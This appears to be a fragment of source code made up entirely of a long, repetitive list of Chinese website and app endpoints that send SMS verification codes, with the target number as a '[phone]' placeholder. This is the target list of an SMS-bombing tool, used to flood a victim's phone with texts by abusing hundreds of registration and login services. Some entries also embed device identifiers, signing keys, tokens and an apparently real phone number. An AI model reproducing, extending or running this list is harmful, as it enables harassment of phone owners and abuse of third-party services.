"http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "https://passport.xueweigui.com/mobile/sendCode?mobile=[phone]&op=10&k=d12c14cc39c8a48be8c181e401e4b962", + "http://api.wangxiao.cn/app/user.ashx?mobile=[phone]&t=mobilelogincode", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1557631709566&req_time=&user_id=[phone]", + "https://ubas.360jie.com.cn/ubas/event/report?flowNo=49181563973602947&bizCode=REGISTER_LOGIN&eventCode=SEND_SMSCODE&pageName=login.html&ABTest=A&TuanABTest=A&userOprTime=1563973631831&hostApp=APP&sourceType=APK&channelSource=CH_001_IOS&subChannel=&activityInfo=&utm", + "https://plus-api.kankan.com/user/login/sms?from=IOS&mobile=[phone]&sign=b41e46a3446472eaca2c0d0618eb7abd&terminal=IOS", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "https://open.taou.com/maimai/account/v5/send_reg_login_code_v3?ts=1564817141875&access_token=&appid=4&channel=AppStore&density=2&device=iPhone8,1&imei=5C351103-F887-4932-BC59-58C75875EFDE&launch_uuid=10c094ac9b334bbda6d4f2d251d0501f&mobile=+86-[phone]&net=wifi&", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "https://hdgateway.zto.com/auth_account_sendLoginOrRegisterSmsVerifyCode?mobile=[phone]", + "http://m.aihuaju.com/wap/index.php?act=security&op=send_reg_mobile&mobile=[phone]", + "http://m.business-steward.com/ticket/application/message/send_msg.php?tel=[phone]&type=forget", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=9", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=6", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "https://dakaapp.troila.com/api/v7/index/send_sms?phone=[phone]&expect=0", + "http://api.yuyin-tv.com/v1/account/verifycode/register?phone=[phone]", + "http://www.zkzcfu.cn/api/sms/send?mobile=[phone]&event=register", + "http://m.robotest.cn/user/sms.html?tel=[phone]&hash=9f82736455da1c53", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "https://sso-c.souche.com/loginApi/getCaptchaUrlByPhone.json?app=tangeche&phone=[phone]", + "http://m.cstm.org.cn/wxReg/regPhoneCheck?regPhone=[phone]", + "https://class.hujiang.com/classtopic/handler/phonecaptcha?areaID=87051&phoneNumber=[phone]&IsAutoReg=true&TopicID=94149&IsPreview=false&__r=1542430774915", + "http://duanxin.diluw.com/index.php?hm=[phone]", + "http://api2.cloudlinks.cn:80/Users/PhoneCheckCode.ashx?CountryCode=86&PhoneNO=[phone]&AppVersion=6357251", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "https://consumer.fcbox.com/v1/account/sendCode?mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://prod.layadmin.cn/api/message/sendV2?app_id=1&version=1.4.0&channel_id=001&phone=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://api.passport.pptv.com:80/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "http://appsource.taohv.cc/user/sendRegisterCode.php?version_android=4.1.9&channel_android=lianxiang&mobile=[phone]&code=&sign=21119a7fa9bbb06b6470ce49db996711", + "http://duanxin.diluw.com/index.php?hm=[phone]", + "https://iguanyu.com/gywebsite/common/sendVerificationCode?phone=[phone]", + "http://slb-sport.vesal.cn:80/vesal-sport-prod/v1/app/member/getCode?tellAndEmail=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "https://mapi.qfang.com/appapi/v8_3_2/sms/validateCode?codeKey=27FA9799-8840-408F-9C14-116B054296B3&countryCode=86&dataSource=SHENZHEN&devIDFA=5C351103-F887-4932-BC59-58C75875EFDE&devId=C99D7E86-40F2-4B39-A2DD-5438D94BC5E5&devModel=12.4&devOpenUDID=40dfbfa80eda77c04", + "http://www.pureyeah.com/public/api/auth/getVerificationCode?mobile=[phone]&dispatch=", + "https://id.seewo.com/api/recordSEM?systemCode=care&appVersion=%E5%B8%8C%E6%B2%83%E5%AD%A6%E9%99%A2SEM&actionType=1111004&channelName=care&deviceId=&_=1547004660553&userId=[phone]", + "https://a1.go2yd.com/Website/user/login-mobile?platform=1&androidId=3d733e2a62588cd977f14876331368d1&deviceId=5284047f4ffb4e04824a2fd1d1f0cd62&cv=4.8.8.1&secret=7a0a51884d933ea12bc8531edb05147468a8f136&reqid=czak52qh_1547987726471_360&brand=Xiaomi&mobile=8618529142", + "http://jyw.vhujao.cn/m/reg/motregchk.php?mob=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://webapp.qianbao188.aloestec.com/v2/app/pub/channel/smsCode?phone=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://puser.funshion.com/user/sendappsmscodenocaptcha?app=main&app_code=iphone&cl=iphone&content=1", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://mobile.icourses.cn/hep-mobile/sword/app/register/getCodeByPhone?callback=jQuery111009421744498287961_1580993309090&phone=1557078659&_=1580993309108", + "https://donutenglish.koolearn.com/api/message/send_vcode?callback=jQuery111009421744498287961_1580993309090&use=5&sign=1CE8E4BE7B71ABA57CBF20762AF78A0C&mobile=[phone]&app_id=29&_=1580993309093", + "http://cms.51fenmi.com:80/api/base/public/getCode?mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", + "https://iosapi.shixiseng.com/app/telrandcode?sign=6F4C6784400B289D3B0BC2742D704E59&tel=[phone]&time=1564926500.453583&type=reg", + "https://appapi.che168.com/phone/v55/user/CreateRegLoginMobileCode.ashx?_appid=2scapp.ios&_sign=bd185e04d8bdb0422467b0f95f828b49&appversion=7.7.0&channelid=App%20Store&ip=192.168.43.151&mobile=[phone]&udid=5WklXEFrvscsddZR8s3TrLI45Bg0YEW9MkEFqRLSrR1ZKpY81h2wTw8pEHBo", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=11", + "http://www.wehealthchina.net/api/v0.1/vcode?app=doctor&client=android&action=register&phone=[phone]", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://jyqb.jyqb168.com/registerH5/registerCode?phone=[phone]&invite_code=MTE3MDUx&user_from=97bf875e61bd47f", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://b2c.csair.com/portal/smsMessage/EUserVerifyCode?mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=17", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://www.hyb100.com/huoyb/vc10001.action?userid=[phone]&ic10000=", + "http://quan.lukou.com/api/sms/verification_code?phone=[phone]&sign=74F59C2BB6F3830D6EB835FDA7550EB7&t=1564024638", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=16", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "https://esx.3z.cc/index.php?tp=api/send_sms&device_type=iPhone%206s&uid=0&op=reg&appid=6&imei=5C351103-F887-4932-BC59-58C75875EFDE&t=1566798214&pt=2&sign=8737393a0d7dffc46883c5226d482194&ver=1.2.1&phone=[phone]", + "http://www.chaojidaogou.com/MsgHandler.ashx?t=sendcode&phone=[phone]", + "http://dxhz.xqapi.live/api.php?id=[phone]", + "https://pass.cctalk.com/v2/Handler/UCenter?action=SendMsg&mobile=[phone]", + "https://iguanyu.com/gywebsite/common/sendVerificationCode?phone=[phone]", + "http://qhg.api.nbxuanma.com/api/VerifyCode/Send?Phone=[phone]", + "https://user.zhaobiao.cn/ssologin.do?method=sendLoginCodeAjax&mobile=[phone]&hasSend=0", + "https://gateway-api.kuainiujinke.com/etrack/record?date=2019-09-02&refer=https%3A%2F%2Fwww.daishangqian.com%2Fm%2F%23%2Fuser%2Flogin&source=dsq&timestamp=1567390955843&traceId=A15C586B-6CFF-47C7-81FF-3ACFFB39D046&uid=&url=https%3A%2F%2Fwww.daishangqian.com%2Fm%2F%2", + "http://www.51qub.com/member/sendmobilesms?mobile=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://i.xfvw.cn/api/sms/send?mobile=[phone]", + "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", + "https://babyheartapi.ihealthbaby.cn/BabyheartServer/sms/sendMessage?sendType=1&smsType=1&tel=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://www.guaguale.men/api.php?act=user&key=rt1BThTaqQjjqbx1RD&phone=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "https://mp.elong.com/mobilepromotion/common/sendactivitysmscodemtools%20?activityId=9880be64-a7c2-476e-9879-2fe371910f45&mobile=[phone]&gCode=", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://xiangpai.jishiyuanwl.cn/api/public/?service=Login.GetCode0&mobile=[phone]&sign=2019&type=0", + "https://soufunapp.3g.fang.com/http/sfservice.jsp?messagename=appSendMobileCode&mobilephone=[phone]&operatetype=0&sendvoice=0&wirelesscode=2C56469F49A8526BC922ECFA14C22AC7", + "https://appbackend.pohoocredit.com/pro-kuaixin-app-backend/app/user/captcha?mobile=[phone]", + "https://user.hundun.cn/get_identify_code?clientType=pcweb&versionName=&imei=&net=&phone=[phone]&source=verify", + "http://newm.yktour.com.cn/api/captcha/login/info/get?mobile=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1557631709566&req_time=&user_id=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://puser.funshion.com/user/sendappsmscodenocaptcha?app=main&app_code=iphone&cl=iphone&content=%E6%82%A8%E7%9A%84%E7%9F%AD%E4%BF%A1%E9%AA%8C%E8%AF%81%E7%A0%81%E6%98%AF%3A%25verifycode%25%E3%80%82%E6%82%A8%E7%9A%84%E6%89%8B%E6%9C%BA%E5%8F%B7%E6%AD%A3%E5%9C%A8%E4%", + "https://ucenter.1haitao.com/vc/mobile/SMSCode.htm?codeType=login&mobile=[phone]&sign=ea7f6860aa40d220409b892397890184", + "http://app.syxwnet.com/?app=member&controller=index&action=sendMobileMessage&mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "https://client.cangshuyuedu.com/api/Sys/SendSmsAuthCode?callback=jQuery111009421744498287961_1580993309090&pType=4&app_version=2.0.7&pkgname=com.yokong.bookfree&channel_id=1&device_id=f75c53c90f4a6635d5f6c7136120154d&mob=[phone]&platform=IOS&uid=0&token=bfd31758556", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=10", + "http://m.tk.cn/tkmobile/orderSentSmsServlet?mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://www.ahtba.org.cn/Registration/SendSms?phone=[phone]&_=1570683350704", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", + "http://passport.csdn.net/account/mobileregister?action=sendMobileCode&mobile=[phone]", + "https://m.health.pingan.com/mapi/smsCode.json?deviceId=5a4c935cbb6ff6ca&deviceType=SM-G9300&timestamp=1545122608&app=0&platform=3&app_key=PAHealth&osversion=23&info=&version=1.0.1&resolution=1440x2560&screenSize=22&netType=1&channel=m_h5&phone=[phone]", + "https://shared.ivydad.com/api/mobile/member/sendSmsCode?callback=jQuery111009421744498287961_1580993309090&appid=wx0e2dec5e762806fd&version=2.8.1&app_name=ivydad&channel=App%20Store&sys_version=12.4.1&type=register&sys_type=ios&token=&member_uuid=0&device_name=iPho", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=4", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://m.health.pingan.com:443/mapi/smsCode.json?deviceId=5a4c935cbb6ff6ca&deviceType=SM-G9300&timestamp=1545122608&app=0&platform=3&app_key=PAHealth&osversion=23&info=&version=1.0.1&resolution=1440x2560&screenSize=22&netType=1&channel=m_h5&phone=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://www.wehealthchina.net/api/v0.1/vcode?app=doctor&client=android&action=register&phone=[phone]", + "http://www.zhiguker.com/index/user/regYzm?phone=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://duanxin.diluw.com/index.php?hm=[phone]&ok=", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://park.chemi.ren//serverpark/index.php/Api/Mobileapi/getCode?phone=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "https://nuc.api.mgtv.com/GetMobileCode?_support=10100001&device=Redmi&osVersion=6.0.1&appVersion=6.2.0&ticket=&userId=0&mac=i8812baafc8de4fe&osType=android&channel=qq&uuid=&endType=mgtvapp&androidid=8812baafc8de4fe4&imei=&macaddress=&seqId=&version=5.2&type=10&abro", + "https://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]&img_vc=", + "http://jyqb.jyqb168.com/registerH5/registerCode?phone=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://api.qingmang.me/v1/account.sendVerification?code=1566478386.8872059778&phone=%2B86[phone]&token=YzllOTI2NGEtYzRkYi0xMWU5LTgxY2ItMDAxNjNlMDM2OTg5&platform=life_ios&udid=966d9749eb41b1f81489cabc0bc05c35a1f97032&v=2.6.12&vc=6", + "http://i.vaakwe.com/user/reg_send_code.php?mobile=[phone]&country=0086&udid=a884f6c7f15ff08a97ab16e4d33fe2c216a9ebed&imei=02:00:00:00:00:00&mac=02:00:00:00:00:00&imsi=02:00:00:00:00:00&token=ba4edbf30bc5363ba02875fc4c6b25c8a21ed8a99e21c5c40ff6385c43c71c8b&type=sms&", + "http://msg.106117.com/submit_ajax.ashx?callback=jQuery11120017795995642418072_1558097551516&username=[phone]&action=getValidate&_=1558097551517", + "http://m.cqrenrenle.com/v3/users/code?mobile=[phone]&from=reg&packagename=com.feifan.app&platform=android", + "https://user.meilimei.com/taomi/user/sendSmsCaptcha?mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://smsspub.mail.163.com/mobileserv/fsms.do?product=AndroidMail&template=ds&callback=sendCallback0&_=1430485975547&mobile=[phone]", + "https://s-web.jtljia.com/mvc/message/vcode/user_welcome/[phone]", + "http://app.yioucash.com/loan-h5/app/validcode/send?atype=1&phoneNo=[phone]&atype=2", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://h5user.rastargame.com/vcode/Mobile/page/?callback=jQuery111306684320296387496_1551691777816&mobile=[phone]&type=reg&client=wap&_=1551691778330", + "https://passport.ceair.com/cesso/mobile!geetCheck.shtml?_0.3520412800489632&mobileNo=[phone]", + "https://jjy.3g.fang.com/httpclient/agentservice.jsp?groupFlag=ESF&messagename=jjy_getPassportandCustomerIds&phone=[phone]&wirelesscode=57b34f0c5725ee3d9e76c2619c394ae8", + "http://www.51qub.com/member/sendmobilesms?mobile=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://m.aihuaju.com/wap/index.php?act=security&op=send_reg_mobile&mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://dxhz.xqapi.live/api.php?id=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "https://jjy.3g.fang.com/httpclient/agentservice.jsp?groupFlag=ESF&messagename=jjy_getPassportandCustomerIds&phone=[phone]&wirelesscode=57b34f0c5725ee3d9e76c2619c394ae8", + "http://photograph.yuanlikj.cn/send/Send?appName=截图秀-对话生成器&TELMobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://appapi-h5.yongche.com/Common/CreateAuthCode?cellphone=[phone]", + "http://ttq.api.yolanda.hk/api/v5/users/identifying_code.json?address=&app_id=TTQ&app_revision=2.2.2&cellphone_type=iPhone 6s-12.4&login=[phone]&mob_type=1&platform=iphone&send_type=1&systemLaunguage=zh-Hans-CN", + "https://mapi.qfang.com/appapi/v8_3_2/sms/validateCode?codeKey=27FA9799-8840-408F-9C14-116B054296B3&countryCode=86&dataSource=SHENZHEN&devIDFA=5C351103-F887-4932-BC59-58C75875EFDE&devId=C99D7E86-40F2-4B39-A2DD-5438D94BC5E5&devModel=12.4&devOpenUDID=40dfbfa80eda77c04", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://xinweixin.11183.com.cn/youzheng/login/security?phone=[phone]", + "http://gk.huixinyt.com/app1dxxy/index.php/Index/getcode1?1=1&mobile=[phone]&_=1551173567907", + "https://pass.hujiang.com/v2/Handler/UCenter?action=SendMsg&imgcode=&token=1e7bbab658a5b65cbc3074d6296a0b9b&sendtype=register&msgtype=1&captchaVersion=2&user_domain=hj&business_domain=&hpuid=P0S4wETf4noqmS29L5650&callback=reqwest_1546707722757024049&mobile=%2B86-[ph", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "https://gateway-api.kuainiujinke.com/etrack/record?date=2019-09-02&refer=https%3A%2F%2Fwww.daishangqian.com%2Fm%2F%23%2Fuser%2Flogin&source=dsq&timestamp=1567390955843&traceId=A15C586B-6CFF-47C7-81FF-3ACFFB39D046&uid=&url=https%3A%2F%2Fwww.daishangqian.com%2Fm%2F%2", + "http://xinweixin.11183.com.cn/youzheng/login/security?phone=[phone]", + "https://api.1sapp.com/captcha/getSmsCaptcha?GUID=9b079137577015d58e0428cbae5.61417812&OSVersion=12.4&active_method=icon&deviceCode=5C351103-F887-4932-BC59-58C75875EFDE&distinct_id=&dtu=100&lat=29.58959433282935&lon=106.281065329089&network=WIFI&sign=73ffc97fcc0d33c", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "https://pass.cctalk.com/intraApi/v1/sms/send?action=SendMsg&business_domain=yyy_cctalk&captchaVersion=2&hpuid=785-0bCp21yf6XXmRiz-40&imgcode=&isapp=true&mobile=%2B86-[phone]&msgtype=1&sendtype=mobilemsgpwd&token=3cab2a2b042928518869ab9fee57ce03&user_domain=cc", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "https://papa.51nbapi.com/mobile/app/phoneCheck?phone=[phone]&appName=sujiebaitiao&appChannel=AppStore&appVersion=1.2.0&appDevice=I", + "http://qhg.api.nbxuanma.com/api/VerifyCode/Send?Phone=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "https://api.1sapp.com/captcha/getSmsCaptcha?GUID=9b079137577015d58e0428cbae5.61417812&OSVersion=12.4&active_method=icon&deviceCode=5C351103-F887-4932-BC59-58C75875EFDE&distinct_id=&dtu=100&lat=29.58959433282935&lon=106.281065329089&network=WIFI&sign=73ffc97fcc0d33c", + "http://www.henhuoapp.com/api/method/getCode?phone=[phone]&type=1", + "http://sqb.xiaoshijie.com/api/1/user/getCaptcha/?_did=00000000-7998-6e7e-026a-0aa25c86693a&_app=sqbao&_atype=android&_network=2&_networkType=0&_t=1556866758&_swidth=1080&_sheight=1920&_imei=861913032338784&_manufacture=ZTE&_model=ZTE+BV0730&_osver=6.0&_tn=0&_st=0&i", + "http://id.ifeng.com/api/simplesendmsg?mobile=[phone]&comefrom=7&auth=&msgtype=0", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", + "https://pass.cctalk.com/v2/Handler/UCenter?action=SendMsg&mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=21", + "http://www.jxxw.com.cn/app/user/sendLoginCode?username=[phone]&sign=572bf336d708a2b8b655ea05872cb596", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", + "http://www.huobiao.cn/core/login/get_code_snv?jsonpcallback=jQuery22408161556854897054_1570699976143&phone=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "https://put.zoosnet.net/lr/sendnote160711.aspx?tel=[phone]&ccode=&id=PUT60101350&sid=72a49eb9c9b94b2692a44daa50e2011c&cid=72a49eb9c9b94b2692a44daa50e2011c&lng=cn&p=http%3A//www.lxcpa.net/&e=&un=&ud=&on=&d=1589617104719", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://app.quanlaoda.com/app.php?&m=code&a=send_login_code&phone=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://api.hanju.koudaibaobao.com/api/user/verifyMobile?_ts=1564136775711&country=%2B86&mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]&_=1506486656411", + "http://www.dangaoss.com/h5/acc/send_code?_t=1552475308&sign=424064b2d2d003d83db05380438824cb&username=[phone]", + "https://pass.cctalk.com/v2/Handler/UCenter?action=SendMsg&mobile=[phone]", + "http://user.daojia.com/user/getSmscode?mobile=[phone]&bu=", + "https://pass.cctalk.com/intraApi/v1/sms/send?action=SendMsg&business_domain=yyy_cctalk&captchaVersion=2&hpuid=785-0bCp21yf6XXmRiz-40&imgcode=&isapp=true&mobile=%2B86-[phone]&msgtype=1&sendtype=mobilemsgpwd&token=3cab2a2b042928518869ab9fee57ce03&user_domain=cc", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://api.wangxiao.cn/app/user.ashx?mobile=[phone]&t=mobilelogincode", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + 